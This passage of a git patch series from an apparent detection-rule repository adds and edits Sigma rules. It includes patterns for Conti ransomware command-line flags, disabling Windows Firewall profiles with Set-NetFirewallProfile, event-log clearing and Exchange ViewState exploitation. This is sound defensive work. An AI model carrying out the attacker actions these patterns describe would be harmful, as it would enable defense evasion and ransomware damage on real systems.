selection: + ResultType: 53003 + condition: selection +level: medium +tags: + - attack.credential_access + - attack.t1110 From 9810a9fe730f92f3c99188f493876abae3b42435 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 11 Oct 2021 07:42:04 +0200 Subject: [PATCH 1203/1367] add powershell.yml --- tools/config/generic/powershell.yml | 44 +++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 tools/config/generic/powershell.yml diff --git a/tools/config/generic/powershell.yml b/tools/config/generic/powershell.yml new file mode 100644 index 00000000..23bc322e --- /dev/null +++ b/tools/config/generic/powershell.yml @@ -0,0 +1,44 @@ +title: Conversion of Generic Rules into Powershell Specific EventID Rules +order: 10 +logsources: + ps_module: + category: ps_module + product: windows + conditions: + EventID: 4103 + rewrite: + product: windows + service: powershell + ps_script: + category: ps_script + product: windows + conditions: + EventID: 4104 + rewrite: + product: windows + service: powershell + # for the "classic" channel + ps_classic_start: + category: ps_classic_start + product: windows + conditions: + EventID: 400 + rewrite: + product: windows + service: powershell-classic + ps_classic_provider_start: + category: ps_classic_provider_start + product: windows + conditions: + EventID: 600 + rewrite: + product: windows + service: powershell-classic + ps_classic_script: + category: ps_classic_script + product: windows + conditions: + EventID: 800 + rewrite: + product: windows + service: powershell-classic \ No newline at end of file From f1d5605f103f4635aceb894d6ad2c42ed3ea2885 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 11 Oct 2021 07:44:48 +0200 Subject: [PATCH 1204/1367] fix yml space --- tools/config/generic/powershell.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/tools/config/generic/powershell.yml b/tools/config/generic/powershell.yml index 23bc322e..6f8f3828 100644 --- a/tools/config/generic/powershell.yml +++ b/tools/config/generic/powershell.yml @@ -17,24 +17,24 @@ logsources: rewrite: product: windows service: powershell - # for the "classic" channel - ps_classic_start: + # for the "classic" channel + ps_classic_start: category: ps_classic_start product: windows conditions: EventID: 400 rewrite: product: windows - service: powershell-classic - ps_classic_provider_start: + service: powershell-classic + ps_classic_provider_start: category: ps_classic_provider_start product: windows conditions: EventID: 600 rewrite: product: windows - service: powershell-classic - ps_classic_script: + service: powershell-classic + ps_classic_script: category: ps_classic_script product: windows conditions: From 0bf9f1cfd6d69264098fbba7a2eed4a2059df9f3 Mon Sep 17 00:00:00 2001 From: austinsonger Date: Mon, 11 Oct 2021 21:03:48 -0500 Subject: [PATCH 1205/1367] Onelogin Rules --- .../onelogin_assumed_another_user.yml | 21 ++++++++++++++++ .../onelogin/onelogin_user_account_locked.yml | 24 +++++++++++++++++++ 2 files changed, 45 insertions(+) create mode 100644 rules/cloud/onelogin/onelogin_assumed_another_user.yml create mode 100644 rules/cloud/onelogin/onelogin_user_account_locked.yml diff --git a/rules/cloud/onelogin/onelogin_assumed_another_user.yml b/rules/cloud/onelogin/onelogin_assumed_another_user.yml new file mode 100644 index 00000000..869b6fa1 --- /dev/null +++ b/rules/cloud/onelogin/onelogin_assumed_another_user.yml @@ -0,0 +1,21 @@ +title: OneLogin User Assumed Another User +id: 62fff148-278d-497e-8ecd-ad6083231a35 +description: Detects when an user assumed another user account. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/12 +modified: 2021/10/12 +references: + - https://developers.onelogin.com/api-docs/1/events/event-resource +logsource: + service: onelogin.events +detection: + selection: + eventtypeid: + - 3 + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Unknown \ No newline at end of file diff --git a/rules/cloud/onelogin/onelogin_user_account_locked.yml b/rules/cloud/onelogin/onelogin_user_account_locked.yml new file mode 100644 index 00000000..32225dc0 --- /dev/null +++ b/rules/cloud/onelogin/onelogin_user_account_locked.yml @@ -0,0 +1,24 @@ +title: OneLogin User Account Locked +id: a717c561-d117-437e-b2d9-0118a7035d01 +description: Detects when an user acount is locked or suspended. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/12 +modified: 2021/10/12 +references: + - https://developers.onelogin.com/api-docs/1/events/event-resource/ +logsource: + service: onelogin.events +detection: + selection1: # Locked via API + eventtypeid: 532 + selection2: # Locked via API + eventtypeid: 553 + selection3: # Suspended via API + eventtypeid: 551 + condition: 1 of them +level: low +tags: + - attack.impact +falsepositives: + - System may lock or suspend user accounts. \ No newline at end of file From 0978ca92d86ad1f23573a80b42be5f76083fb851 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 11 Oct 2021 21:18:31 -0500 Subject: [PATCH 1206/1367] Update onelogin_assumed_another_user.yml --- rules/cloud/onelogin/onelogin_assumed_another_user.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/cloud/onelogin/onelogin_assumed_another_user.yml b/rules/cloud/onelogin/onelogin_assumed_another_user.yml index 869b6fa1..fa6febcd 100644 --- a/rules/cloud/onelogin/onelogin_assumed_another_user.yml +++ b/rules/cloud/onelogin/onelogin_assumed_another_user.yml @@ -11,11 +11,10 @@ logsource: service: onelogin.events detection: selection: - eventtypeid: - - 3 + eventtypeid: 3 condition: selection level: low tags: - attack.impact falsepositives: - - Unknown \ No newline at end of file + - Unknown From 9faca2f3dc82a68dbdcb547b6666e499418eb17d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 11 Oct 2021 22:54:05 -0500 Subject: [PATCH 1207/1367] Update onelogin_assumed_another_user.yml --- rules/cloud/onelogin/onelogin_assumed_another_user.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/onelogin/onelogin_assumed_another_user.yml b/rules/cloud/onelogin/onelogin_assumed_another_user.yml index fa6febcd..51fb2fd7 100644 --- a/rules/cloud/onelogin/onelogin_assumed_another_user.yml +++ b/rules/cloud/onelogin/onelogin_assumed_another_user.yml @@ -11,7 +11,7 @@ logsource: service: onelogin.events detection: selection: - eventtypeid: 3 + event_type_id: 3 condition: selection level: low tags: From d273bc25ea137d612165207db5c839dff1ef0d2b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 12 Oct 2021 11:56:37 -0500 Subject: [PATCH 1208/1367] Create powershell_windows_firewall_disabled.yml --- .../powershell_windows_firewall_disabled.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml diff --git a/rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml b/rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml new file mode 100644 index 00000000..3d3a596b --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml @@ -0,0 +1,27 @@ +title: Windows Firewall Profile Disabled +id: 488b44e7-3781-4a71-888d-c95abfacf44d +description: Detects when a user disables the Windows Firewall via a Profile to help evade defense. +status: experimental +author: Austin Songer @austinsonger +date: 2021/10/12 +references: +- https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps +- https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell +- http://powershellhelp.space/commands/set-netfirewallrule-psv5.php +- http://woshub.com/manage-windows-firewall-powershell/ +logsource: + product: windows + service: powershell +detection: + selection: + CommandLine|contains|all: + - Set-NetFirewallProfile + - -Profile + - -Enabled + - 'False' + condition: selection +tags: +- attack.defense_evasion +level: high +falsepositives: +- Unknown From 40eed2ec59bc6678c9468b604056c307be039835 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 12 Oct 2021 11:57:37 -0500 Subject: [PATCH 1209/1367] Rename powershell_windows_firewall_disabled.yml to powershell_windows_firewall_profile_disabled.yml --- ...abled.yml => powershell_windows_firewall_profile_disabled.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/powershell/powershell_script/{powershell_windows_firewall_disabled.yml => powershell_windows_firewall_profile_disabled.yml} (100%) diff --git a/rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml similarity index 100% rename from rules/windows/powershell/powershell_script/powershell_windows_firewall_disabled.yml rename to rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml From 37c637066bce692729e9197f6f8f514df524a5bc Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 12 Oct 2021 20:57:12 +0200 Subject: [PATCH 1210/1367] add process_creation_conti_cmd_ransomware.yml --- .../process_creation_conti_cmd_ransomware.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml diff --git a/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml b/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml new file mode 100644 index 00000000..461cfb04 --- /dev/null +++ b/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml @@ -0,0 +1,29 @@ +title: Conti Ransomware Execution +id: 689308fc-cfba-4f72-9897-796c1dc61487 +status: experimental +author: frack113 +date: 2021/10/12 +description: Conti ransomware command line ioc +references: + - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ + - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 +tags: + - attack.impact + - attack.s0575 + - attack.t1486 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - '-m ' + - '-net ' + - '-size ' #size 10 in references + - '-nomutex ' + - '-p \\' + - '$' + condition: selection +falsepositives: + - Unknown should be low +level: critical From 5aa62bd342dd7e60294b1ac89f772a2cff611401 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 12 Oct 2021 21:02:15 +0200 Subject: [PATCH 1211/1367] fix yml --- .../process_creation_conti_cmd_ransomware.yml | 58 +++++++++---------- 1 file changed, 29 insertions(+), 29 deletions(-) diff --git a/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml b/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml index 461cfb04..776c4d12 100644 --- a/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml +++ b/rules/windows/process_creation/process_creation_conti_cmd_ransomware.yml @@ -1,29 +1,29 @@ -title: Conti Ransomware Execution -id: 689308fc-cfba-4f72-9897-796c1dc61487 -status: experimental -author: frack113 -date: 2021/10/12 -description: Conti ransomware command line ioc -references: - - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ - - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 -tags: - - attack.impact - - attack.s0575 - - attack.t1486 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains|all: - - '-m ' - - '-net ' - - '-size ' #size 10 in references - - '-nomutex ' - - '-p \\' - - '$' - condition: selection -falsepositives: - - Unknown should be low -level: critical +title: Conti Ransomware Execution +id: 689308fc-cfba-4f72-9897-796c1dc61487 +status: experimental +author: frack113 +date: 2021/10/12 +description: Conti ransomware command line ioc +references: + - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ + - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19 +tags: + - attack.impact + - attack.s0575 + - attack.t1486 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - '-m ' + - '-net ' + - '-size ' #size 10 in references + - '-nomutex ' + - '-p \\' + - '$' + condition: selection +falsepositives: + - Unknown should be low +level: critical From 3d8002a2375bb838f9c0a70cf7a4a2221efdf20d Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 11:40:24 +0200 Subject: [PATCH 1212/1367] fix: Use 'Provider Name' for windows eventlog log sources --- rules/windows/builtin/win_audit_cve.yml | 4 ++-- rules/windows/builtin/win_event_log_cleared.yml | 4 ++-- rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml | 4 ++-- .../windows/builtin/win_software_atera_rmm_agent_install.yml | 5 +++-- rules/windows/builtin/win_susp_backup_delete.yml | 3 ++- rules/windows/builtin/win_susp_dhcp_config.yml | 3 ++- rules/windows/builtin/win_susp_dhcp_config_failed.yml | 4 ++-- rules/windows/builtin/win_susp_eventlog_cleared.yml | 4 ++-- rules/windows/builtin/win_susp_msmpeng_crash.yml | 5 +++-- rules/windows/builtin/win_system_susp_eventlog_cleared.yml | 4 ++-- rules/windows/builtin/win_volume_shadow_copy_mount.yml | 5 +++-- rules/windows/builtin/win_vul_cve_2020_0688.yml | 4 ++-- tools/config/winlogbeat-modules-enabled.yml | 2 +- 13 files changed, 28 insertions(+), 23 deletions(-) diff --git a/rules/windows/builtin/win_audit_cve.yml b/rules/windows/builtin/win_audit_cve.yml index 74dcdfe7..822c5b3b 100644 --- a/rules/windows/builtin/win_audit_cve.yml +++ b/rules/windows/builtin/win_audit_cve.yml @@ -23,13 +23,13 @@ tags: - attack.t1499.004 author: Florian Roth date: 2020/01/15 -modified: 2020/08/23 +modified: 2021/10/13 logsource: product: windows service: application detection: selection: - Source: 'Microsoft-Windows-Audit-CVE' + Provider Name: 'Microsoft-Windows-Audit-CVE' condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 992e3711..cac25a3c 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -5,7 +5,7 @@ description: Checks for event id 1102 which indicates the security event log was references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SecurityEventLogCleared.yaml date: 2021/08/15 -modified: 2021/10/08 +modified: 2021/10/13 author: Saw Winn Naung level: medium logsource: @@ -17,7 +17,7 @@ tags: detection: selection: EventID: 1102 - Source: Microsoft-Windows-Eventlog + Provider Name: Microsoft-Windows-Eventlog condition: selection fields: - SubjectLogonId diff --git a/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml index 20fef927..df8a9835 100644 --- a/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml +++ b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml @@ -11,7 +11,7 @@ tags: status: experimental author: "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)" date: 2019/05/24 -modified: 2020/08/23 +modified: 2021/10/13 logsource: product: windows service: system @@ -20,7 +20,7 @@ detection: EventID: - 56 - 50 - Source: TermDD + Provider Name: TermDD condition: selection falsepositives: - Bad connections or network interruptions diff --git a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml index b3a7f22b..33a5a4da 100644 --- a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml +++ b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml @@ -5,6 +5,7 @@ description: Detects successful installation of Atera Remote Monitoring & Manage references: - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent date: 2021/09/01 +modified: 2021/10/13 author: Bhabesh Raj level: high logsource: @@ -15,8 +16,8 @@ tags: detection: selection: EventID: 1033 - Source: MsiInstaller + Provider Name: MsiInstaller Message|contains: AteraAgent condition: selection falsepositives: - - Legitimate Atera agent installation \ No newline at end of file + - Legitimate Atera agent installation diff --git a/rules/windows/builtin/win_susp_backup_delete.yml b/rules/windows/builtin/win_susp_backup_delete.yml index fc655911..4a8f9cb1 100644 --- a/rules/windows/builtin/win_susp_backup_delete.yml +++ b/rules/windows/builtin/win_susp_backup_delete.yml @@ -7,6 +7,7 @@ references: - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 author: Florian Roth (rule), Tom U. @c_APT_ure (collection) date: 2017/05/12 +modified: 2021/10/13 tags: - attack.defense_evasion - attack.t1107 # an old one @@ -17,7 +18,7 @@ logsource: detection: selection: EventID: 524 - Source: Microsoft-Windows-Backup + Provider Name: Microsoft-Windows-Backup condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_dhcp_config.yml b/rules/windows/builtin/win_susp_dhcp_config.yml index 4eb671a1..43cf46c4 100644 --- a/rules/windows/builtin/win_susp_dhcp_config.yml +++ b/rules/windows/builtin/win_susp_dhcp_config.yml @@ -7,6 +7,7 @@ references: - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx date: 2017/05/15 +modified: 2021/10/13 author: Dimitrios Slamaris tags: - attack.defense_evasion @@ -18,7 +19,7 @@ logsource: detection: selection: EventID: 1033 - Source: Microsoft-Windows-DHCP-Server + Provider Name: Microsoft-Windows-DHCP-Server condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_dhcp_config_failed.yml b/rules/windows/builtin/win_susp_dhcp_config_failed.yml index fa66676a..8a5ae79a 100644 --- a/rules/windows/builtin/win_susp_dhcp_config_failed.yml +++ b/rules/windows/builtin/win_susp_dhcp_config_failed.yml @@ -7,7 +7,7 @@ references: - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx date: 2017/05/15 -modified: 2019/07/17 +modified: 2021/10/13 tags: - attack.defense_evasion - attack.t1073 # an old one @@ -22,7 +22,7 @@ detection: - 1031 - 1032 - 1034 - Source: Microsoft-Windows-DHCP-Server + Provider Name: Microsoft-Windows-DHCP-Server condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 02b08252..1e04e566 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -9,7 +9,7 @@ references: - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 author: Florian Roth date: 2017/01/10 -modified: 2021/10/08 +modified: 2021/10/13 tags: - attack.defense_evasion - attack.t1070 # an old one @@ -23,7 +23,7 @@ detection: EventID: - 517 - 1102 - Source: Microsoft-Windows-Eventlog + Provider Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index 8cc330fb..f3c6a18a 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml @@ -8,6 +8,7 @@ tags: - attack.t1562.001 status: experimental date: 2017/05/09 +modified: 2021/10/13 references: - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 - https://technet.microsoft.com/en-us/library/security/4022344 @@ -17,10 +18,10 @@ logsource: service: application detection: selection1: - Source: 'Application Error' + Provider Name: 'Application Error' EventID: 1000 selection2: - Source: 'Windows Error Reporting' + Provider Name: 'Windows Error Reporting' EventID: 1001 keywords: - 'MsMpEng.exe' diff --git a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml index c267a4a6..3a865550 100644 --- a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml @@ -11,7 +11,7 @@ references: - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 author: Florian Roth date: 2017/01/10 -modified: 2021/09/21 +modified: 2021/10/13 tags: - attack.defense_evasion - attack.t1070 # an old one @@ -23,7 +23,7 @@ logsource: detection: selection: EventID: 104 - Source: Microsoft-Windows-Eventlog + Provider Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) diff --git a/rules/windows/builtin/win_volume_shadow_copy_mount.yml b/rules/windows/builtin/win_volume_shadow_copy_mount.yml index c7400389..0efcb797 100644 --- a/rules/windows/builtin/win_volume_shadow_copy_mount.yml +++ b/rules/windows/builtin/win_volume_shadow_copy_mount.yml @@ -3,6 +3,7 @@ id: f512acbf-e662-4903-843e-97ce4652b740 description: Detects volume shadow copy mount status: experimental date: 2020/10/20 +modified: 2021/10/13 author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR) tags: - attack.credential_access @@ -14,10 +15,10 @@ logsource: service: system detection: selection: - Source: Microsoft-Windows-Ntfs + Provider Name: Microsoft-Windows-Ntfs EventID: 98 DeviceName|contains: HarddiskVolumeShadowCopy condition: selection falsepositives: - Legitimate use of volume shadow copy mounts (backups maybe). -level: medium \ No newline at end of file +level: medium diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml index 0ab65759..17ccba62 100644 --- a/rules/windows/builtin/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml @@ -7,7 +7,7 @@ references: - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ author: Florian Roth, wagga date: 2020/02/29 -modified: 2021/06/27 +modified: 2021/10/13 tags: - attack.initial_access - attack.t1190 @@ -17,7 +17,7 @@ logsource: detection: selection1: EventID: 4 - Source: MSExchange Control Panel + Provider Name: 'MSExchange Control Panel' Level: Error selection2: - '&__VIEWSTATE=' diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index f3c48790..ce706fb3 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -108,7 +108,7 @@ fieldmappings: EventID: event.code Channel: winlog.channel #Keywords: from "Value" is lost with winlogbeat exist in nxlog - provider name: winlog.provider_name + Provider Name: winlog.provider_name CallingProcessName: winlog.event_data.CallingProcessName ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType From 1099d40473a14b9467cbe00cedf737d689c4dec1 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 13:04:11 +0200 Subject: [PATCH 1213/1367] rename the field 'Provider Name' to 'Provider_Name' --- rules/windows/builtin/win_audit_cve.yml | 2 +- rules/windows/builtin/win_event_log_cleared.yml | 2 +- rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml | 2 +- .../windows/builtin/win_software_atera_rmm_agent_install.yml | 2 +- rules/windows/builtin/win_susp_backup_delete.yml | 2 +- rules/windows/builtin/win_susp_dhcp_config.yml | 2 +- rules/windows/builtin/win_susp_dhcp_config_failed.yml | 2 +- rules/windows/builtin/win_susp_eventlog_cleared.yml | 2 +- rules/windows/builtin/win_susp_msmpeng_crash.yml | 4 ++-- rules/windows/builtin/win_system_susp_eventlog_cleared.yml | 2 +- rules/windows/builtin/win_volume_shadow_copy_mount.yml | 2 +- rules/windows/builtin/win_vul_cve_2020_0688.yml | 2 +- tools/config/winlogbeat-modules-enabled.yml | 2 +- 13 files changed, 14 insertions(+), 14 deletions(-) diff --git a/rules/windows/builtin/win_audit_cve.yml b/rules/windows/builtin/win_audit_cve.yml index 822c5b3b..acb6c067 100644 --- a/rules/windows/builtin/win_audit_cve.yml +++ b/rules/windows/builtin/win_audit_cve.yml @@ -29,7 +29,7 @@ logsource: service: application detection: selection: - Provider Name: 'Microsoft-Windows-Audit-CVE' + Provider_Name: 'Microsoft-Windows-Audit-CVE' condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index cac25a3c..26deafd0 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -17,7 +17,7 @@ tags: detection: selection: EventID: 1102 - Provider Name: Microsoft-Windows-Eventlog + Provider_Name: Microsoft-Windows-Eventlog condition: selection fields: - SubjectLogonId diff --git a/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml index df8a9835..0ffb293a 100644 --- a/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml +++ b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml @@ -20,7 +20,7 @@ detection: EventID: - 56 - 50 - Provider Name: TermDD + Provider_Name: TermDD condition: selection falsepositives: - Bad connections or network interruptions diff --git a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml index 33a5a4da..5c38131a 100644 --- a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml +++ b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml @@ -16,7 +16,7 @@ tags: detection: selection: EventID: 1033 - Provider Name: MsiInstaller + Provider_Name: MsiInstaller Message|contains: AteraAgent condition: selection falsepositives: diff --git a/rules/windows/builtin/win_susp_backup_delete.yml b/rules/windows/builtin/win_susp_backup_delete.yml index 4a8f9cb1..b7b91a54 100644 --- a/rules/windows/builtin/win_susp_backup_delete.yml +++ b/rules/windows/builtin/win_susp_backup_delete.yml @@ -18,7 +18,7 @@ logsource: detection: selection: EventID: 524 - Provider Name: Microsoft-Windows-Backup + Provider_Name: Microsoft-Windows-Backup condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_dhcp_config.yml b/rules/windows/builtin/win_susp_dhcp_config.yml index 43cf46c4..8b5b0feb 100644 --- a/rules/windows/builtin/win_susp_dhcp_config.yml +++ b/rules/windows/builtin/win_susp_dhcp_config.yml @@ -19,7 +19,7 @@ logsource: detection: selection: EventID: 1033 - Provider Name: Microsoft-Windows-DHCP-Server + Provider_Name: Microsoft-Windows-DHCP-Server condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_dhcp_config_failed.yml b/rules/windows/builtin/win_susp_dhcp_config_failed.yml index 8a5ae79a..dbb4ca85 100644 --- a/rules/windows/builtin/win_susp_dhcp_config_failed.yml +++ b/rules/windows/builtin/win_susp_dhcp_config_failed.yml @@ -22,7 +22,7 @@ detection: - 1031 - 1032 - 1034 - Provider Name: Microsoft-Windows-DHCP-Server + Provider_Name: Microsoft-Windows-DHCP-Server condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 1e04e566..17d5e4b9 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -23,7 +23,7 @@ detection: EventID: - 517 - 1102 - Provider Name: Microsoft-Windows-Eventlog + Provider_Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index f3c6a18a..a128d21d 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml @@ -18,10 +18,10 @@ logsource: service: application detection: selection1: - Provider Name: 'Application Error' + Provider_Name: 'Application Error' EventID: 1000 selection2: - Provider Name: 'Windows Error Reporting' + Provider_Name: 'Windows Error Reporting' EventID: 1001 keywords: - 'MsMpEng.exe' diff --git a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml index 3a865550..be029b51 100644 --- a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml @@ -23,7 +23,7 @@ logsource: detection: selection: EventID: 104 - Provider Name: Microsoft-Windows-Eventlog + Provider_Name: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) diff --git a/rules/windows/builtin/win_volume_shadow_copy_mount.yml b/rules/windows/builtin/win_volume_shadow_copy_mount.yml index 0efcb797..4d0d21f2 100644 --- a/rules/windows/builtin/win_volume_shadow_copy_mount.yml +++ b/rules/windows/builtin/win_volume_shadow_copy_mount.yml @@ -15,7 +15,7 @@ logsource: service: system detection: selection: - Provider Name: Microsoft-Windows-Ntfs + Provider_Name: Microsoft-Windows-Ntfs EventID: 98 DeviceName|contains: HarddiskVolumeShadowCopy condition: selection diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml index 17ccba62..679f144f 100644 --- a/rules/windows/builtin/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml @@ -17,7 +17,7 @@ logsource: detection: selection1: EventID: 4 - Provider Name: 'MSExchange Control Panel' + Provider_Name: 'MSExchange Control Panel' Level: Error selection2: - '&__VIEWSTATE=' diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index ce706fb3..c21d189e 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -108,7 +108,7 @@ fieldmappings: EventID: event.code Channel: winlog.channel #Keywords: from "Value" is lost with winlogbeat exist in nxlog - Provider Name: winlog.provider_name + Provider_Name: winlog.provider_name CallingProcessName: winlog.event_data.CallingProcessName ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType From 7c01710d9d29e14789cda6945bf7314270f5a473 Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Wed, 13 Oct 2021 15:12:36 +0400 Subject: [PATCH 1214/1367] Change the service to the form service: azure._a_name_ and add falsepositives field --- 